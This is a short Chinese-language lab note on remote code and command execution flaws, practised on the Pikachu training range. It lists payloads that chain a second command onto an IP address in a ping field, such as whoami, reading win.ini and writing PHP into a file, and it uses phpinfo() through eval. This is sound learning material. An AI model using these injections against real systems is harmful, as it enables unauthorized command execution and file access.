RCE 远程执行漏洞
概述:在Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理,若应用对用户的输入过滤不严,容易产生远程代码执行漏洞或系统命令执行漏洞;
分为远程代码执行和远程系统命令执行
pikachu靶场
1.ping
在ip地址的后门拼接说我们自己想执行的命令
127.0.0.1 & ipconfig
127.0.0.1 & whoami
127.0.0.1 && type C:\Windows\win.ini
查看win.ini文件内容
同样的可以拼接各种命令如:echo
127.0.0.1 | echo "<?php 123 ?>" >1.txt
2.eval
eval():会将符合PHP 语法规范字符串当作php代码执行。
phpinfo();输入这个显示函数,用于显示 PHP 运行环境的配置信息